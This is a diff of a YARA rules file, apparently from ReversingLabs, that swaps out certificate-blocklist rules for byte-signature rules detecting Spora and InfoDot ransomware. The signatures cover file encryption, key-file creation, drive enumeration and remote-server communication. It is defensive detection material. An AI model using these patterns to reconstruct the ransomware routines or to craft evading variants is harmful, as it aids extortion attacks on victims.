+            ?? 13 ?? 08 11 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
+            2B ?? 06 09 16 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 09 16 11 ?? 6F ?? ?? ?? ?? 11
+            ?? 11 ?? 6A D6 13 ?? 11 ?? 11 ?? FE ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 08
+            6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? DE ?? 2A
+        }
+		$enum_drives = {
+            00 00 28 ?? ?? ?? ?? 1F ?? 0A 18 0C 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 0C 28 ?? ?? ?? ?? 0D 1A
+            0C 09 13 ?? 16 13 ?? 11 ?? 11 ?? 8E 69 FE ?? 2C ?? 11 ?? 11 ?? 9A 13 ?? 1B 0C 11 ??
+            6F ?? ?? ?? ?? 2C ?? 1C 0C 11 ?? 6F ?? ?? ?? ?? 19 FE ?? 16 FE ?? 65 18 60 1A 60 11
+            ?? 6F ?? ?? ?? ?? 21 ?? ?? ?? ?? ?? ?? ?? ?? FE ?? 16 FE ?? 65 5F 16 FE ?? 2C ?? 1D
+            0C 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1E 0C 11 ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B
+        }
+		$file_search = {
+            A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10]
+            A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 0D 19 0C 19 8D ?? ?? ?? ??
+            25 16 [5-10] A2 25 17 [5-10] A2 25 18 [5-10] A2 13 04 1A 0C 02 28 ?? ?? ?? ?? 13 ?? 1B
+            0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? (30 | 3D) [1-4] 1C 0C 11 ?? 11 ?? 9A 28
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1D 0C 09 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 9A [5-10] 6F
+            ?? ?? ?? ?? 16 FE ?? 5F 11 ?? 11 ?? 9A 1F ?? 28 ?? ?? ?? ?? [5-10] 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 16 FE ?? 5F 11 ?? [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 5F 2C ?? 1E 0C 11 ?? 11 ??
+            9A 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? (38 | 2B) [1-4] 1F ?? 0C 02 28 ?? ?? ?? ??
+            13 ?? 1F ?? 0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? 30 ?? 1F ?? 0C 11 ?? 11 ??
+            11 ?? 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE ?? 2C ?? 1F ?? 0C 11 ?? 11 ?? 9A 28 ?? ??
+            ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B ?? 1F ?? 0C 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F
+            ?? ?? ?? ?? 8E 69 17 DA 18 FE ?? 16 FE ?? 2C ?? 1F ?? 0C 02 16 28 ?? ?? ?? ?? DD ?? ??
+            ?? ?? 07 17 58 16 0B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? DE
+        }
+		$remote_server_communication_1 = {
+            00 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 9A [5-10] 28 ??
+            ?? ?? ?? 0B 02 [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 02 [5-10] 16 28 ?? ?? ??
+            ?? 16 FE ?? 39 ?? ?? ?? ?? 1D 8D ?? ?? ?? ?? 25 16 [5-10] A2 25 17 02 A2 25 18 [5-10] A2
+            25 19 7E ?? ?? ?? ?? A2 25 1A [5-10] A2 25 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1C [5-10]
+            A2 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ??
+            [5-10] 11 ?? 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07
+            28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? [5-10] 6F ?? ?? ?? ?? 11 ?? [5-10] 6F ?? ?? ?? ??
+            11 ?? 11 ?? 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ??
+            ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
+            74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fort LLC" and ( pe.signatures [ i ] . serial == "00:ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" or pe.signatures [ i ] . serial == "ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" ) and 1604937337 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $enum_drives and $file_search and $encrypt_files and $remote_server_communication_1
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7B91468122273Aa32B7Cfc80C331Ea13 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Spora : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Spora ransomware."
 		author = "ReversingLabs"
-		id = "2a949015-3b7b-5123-8df1-f2199ef636c9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f07ee1d4-d99b-5cbf-a1f0-a3802d9e3b47"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6676-L6692"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "49d6fd8b325df4bc688275a09cee35e1040172eb6f3680aa2b6f0f3640c0782e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Spora.yara#L1-L124"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4e18bb42277ce9194bf75fa45d95ea7e2bd51c5d7791d3d6e013fc07626e65b0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Spora"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 57 FF 75 ?? 33 FF 89 7D ?? FF 15 ?? ?? ?? ?? 83 F8
+            ?? 0F 84 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 53 56 57 BE
+            ?? ?? ?? ?? 56 6A ?? 57 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
+            ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F
+            82 ?? ?? ?? ?? 6A ?? 57 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 57 8D 45 ?? 50 56 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 39 75
+            ?? 0F 85 ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 3B
+            45 ?? 0F 84 ?? ?? ?? ?? 39 7D ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? B9 ?? ??
+            ?? ?? 3B C1 72 ?? 89 4D ?? EB ?? 83 E0 ?? 89 45 ?? 57 FF 75 ?? 57 6A ?? 57 53 FF 15
+            ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? FF 75 ?? 57 57 6A ?? 50 FF 15 ?? ?? ??
+            ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57 FF
+            75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57
+            FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 57 57
+            57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 6A ??
+            57 57 53 89 45 ?? FF 15 ?? ?? ?? ?? 57 8D 45 ?? 50 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50
+            53 FF D6 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF D6 C7 45 ?? ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? C7 45 ??
+            ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 5E 5B 8B 45 ?? 5F 83 C5 ?? C9 C2
+        }
+		$create_key_file = {
+            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? 33 F6 89 75 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 45
+            ?? 50 56 6A ?? 56 FF 35 ?? ?? ?? ?? FF D7 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0
+            ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 56 56 56 FF 75 ?? FF D7 85 C0 0F 84 ?? ?? ?? ??
+            53 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B F8 3B FE 0F 84 ?? ?? ?? ?? 56 6A
+            ?? 57 56 FF 15 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50
+            FF 15 ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ??
+            89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 68
+            ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7D ??
+            ?? ?? ?? ?? 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? 57 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B D8 3B DE 74 ?? 89 75 ?? 8B 45
+            ?? 56 FF 74 85 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 57 FF 15 ?? ?? ?? ?? FF
+            45 ?? 83 7D ?? ?? 72 ?? 53 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 5B FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B 45 ?? 5E 83 C5 ?? C9 C2
+        }
+		$create_key = {
+            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 57 8D 45 ?? 50 8D 45 ?? 50
+            33 DB 53 6A ?? 53 FF 75 ?? BE ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 53 6A ?? 53 FF 35 ?? ?? ?? ??
+            FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0 ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ??
+            53 53 53 FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 8B 35 ?? ?? ?? ??
+            03 C8 51 6A ?? FF D6 8B F8 89 7D ?? 3B FB 0F 84 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 57 FF
+            15 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 8B 45 ?? 03 C7 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83
+            C4 ?? 8D 45 ?? 50 8B 45 ?? 53 6A ?? 03 C8 51 57 8B 3D ?? ?? ?? ?? FF D7 85 C0 74 ??
+            FF 75 ?? 6A ?? FF D6 8B F0 3B F3 74 ?? 8B 4D ?? 8D 45 ?? 50 8B 45 ?? 56 6A ?? 03 C8
+            51 FF 75 ?? FF D7 33 FF 38 1E 74 ?? 8B C6 80 38 ?? 75 ?? 40 40 8A 08 88 0C 37 47 40
+            38 18 75 ?? 88 1C 37 EB ?? 8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 75 ?? FF 75
+            ?? FF 15 ?? ?? ?? ?? 5F 5B EB ?? 8B 75 ?? 8B C6 5E 83 C5 ?? C9 C2
+        }
+		$create_lst_file = {
+            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 53 56 68 ?? ?? ?? ?? 33 F6 6A ?? 89 75 ?? FF 15 ??
+            ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 45 ?? 8B 38 8D 45
+            ?? 50 53 83 C7 ?? FF 15 ?? ?? ?? ?? 03 C0 50 53 FF 75 ?? FF 17 8B 45 ?? 8B 08 8D 55
+            ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 53 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 8B 08
+            8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ??
+            8B 3D ?? ?? ?? ?? 56 56 56 56 6A ?? 50 56 68 ?? ?? ?? ?? FF D7 89 45 ?? 3B C6 0F 84
+            ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 56
+            56 FF 75 ?? 50 6A ?? FF 75 ?? 56 68 ?? ?? ?? ?? FF D7 8D 45 ?? 50 6A ?? 68 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 E0 ?? 83
+            C0 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D ??
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 56 56
+            56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 6A ?? 53 56 FF 15 ?? ?? ??
+            ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 57 53 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
+            89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57
+            8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 7D ?? 75 ?? FF 75 ?? C7 45 ??
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 3B FE 74 ?? 56 6A ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 56 57 53 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            5F 8B 45 ?? 8B 08 50 FF 51 ?? 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 5E 5B 83 C5 ?? C9 C2
+        }
+		$enumerate_resources = {
+            55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 BE ?? ?? ?? ?? 56 6A ?? FF D3 8B F8 89 7D ??
+            85 FF [2-8] 83 4D ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? 89 75 ?? E8
+            ?? ?? ?? ?? 85 C0 75 ?? 39 45 ?? 74 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 [0-3]
+            E8 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 36 FF 15 ?? ?? ?? ?? 8D 44 00 ?? 50 6A
+            ?? FF D3 8B F8 85 FF 74 ?? FF 36 57 FF 15 ?? ?? ?? ?? [0-5] 57 E8 ?? ?? ??
+            ?? 57 FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 75 ?? 8B 7D ?? 57 FF 15 ?? ?? ?? ?? FF 75
+            ?? E8 ?? ?? ?? ?? 5F 5E 5B C9 C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" and 1586942863 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $create_key_file and $create_lst_file and $enumerate_resources and $encrypt_files ) or ( $create_key and $enumerate_resources and $encrypt_files ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3E267B5D14Cdf1F645C1Ec545Cec3Aee : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Infodot : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects InfoDot ransomware."
 		author = "ReversingLabs"
-		id = "adff6ae2-076c-5c97-9fea-f95d770a3821"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "2f6447f4-523b-5ea1-a16d-d68bb9bcc79d"
+		date = "2021-02-16"
+		modified = "2021-02-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6694-L6710"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e36ae57d715a71aa7d26dd003d647dfa7ab16d64e5411b6c49831544fc482645"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.InfoDot.yara#L1-L115"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "24a1c25c1d70c21323417ae0892c613361c4bfc829737ef86b6fa7616ae668c6"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "InfoDot"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "3e:26:7b:5d:14:cd:f1:f6:45:c1:ec:54:5c:ec:3a:ee" and 1579825892 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Ae6D3C0269Ef6497E14379C51A8507Ba : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "5b8e7730-cb8b-5c51-9784-d944453bc898"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6712-L6730"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "23570962c80bddce28a3dee9d4d864cf3cf64018eec6fbcbdd3ca2658c9f660f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 8B D9 89 9D ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 FF D3 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? EB
+            ?? 8D 49 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75
+            ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50
+            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85
+            C0 74 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 85 D2 74
+            ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0
+            83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 50 FF 15
+        }
+		$find_files_p2 = {
+            8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 56 50 FF D7 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 FF D3 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? F6 85 ?? ??
+            ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 56 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 50 FF D7 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9
+            EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51
+            8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ??
